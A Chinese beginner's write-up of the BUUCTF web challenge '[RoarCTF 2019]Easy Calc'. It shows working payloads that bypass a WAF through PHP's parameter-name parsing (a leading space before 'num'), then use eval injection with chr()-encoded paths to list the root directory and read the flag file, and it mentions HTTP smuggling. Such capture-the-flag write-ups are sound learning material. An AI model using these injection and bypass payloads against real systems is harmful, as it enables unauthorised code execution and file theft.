buuctf初学者学习记录--web第16题

[RoarCTF 2019]Easy Calc

打开靶场:
buuctf初学者学习记录--web第16题
buuctf初学者学习记录--web第16题
查看源代码,发现有一个calc.php文件,并且提示设置了waf
先尝试访问calc.php
buuctf初学者学习记录--web第16题
得到源码,使用get方式传参赋值给num,并且使用正则表达式进行了过滤,只要能绕过过滤,就可以通过eval进行任意php语句
首先尝试直接?num=phpinfo()
buuctf初学者学习记录--web第16题
禁止访问,应该是waf起了作用,根据大佬们的wp知道可以通过在num前加一个空格进行绕过
原理:php解析规则:当php进行解析时,如果变量名前面有空格,php会自动去掉前面的空格再进行解析,假如waf不允许num变量接收字母,那么使用 num就可以,而php解析时就会自动把空格去掉

尝试? num=phpinfo()
buuctf初学者学习记录--web第16题
成功绕过,先使用scandir查看目录中的内容,找到存有flag的文件

? num=scandir("/")

buuctf初学者学习记录--web第16题
忘了/被过滤了,尝试绕过。使用chr对/的ascii码进行转换绕过,只有这个才不需要引号

? num=var_dump(scandir(chr(47)))

buuctf初学者学习记录--web第16题
得到f1agg文件
尝试对该文件进行读取

? num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))

得到flag
buuctf初学者学习记录--web第16题
还有一种解题方法,http走私,参考大佬的博客
[RoarCTF 2019]Easy Calc(http走私 && 利用PHP的字符串解析特性Bypass)

上一篇:Buuctf 刷题笔记(PWN)(2)


下一篇:[BUUCTF misc]draw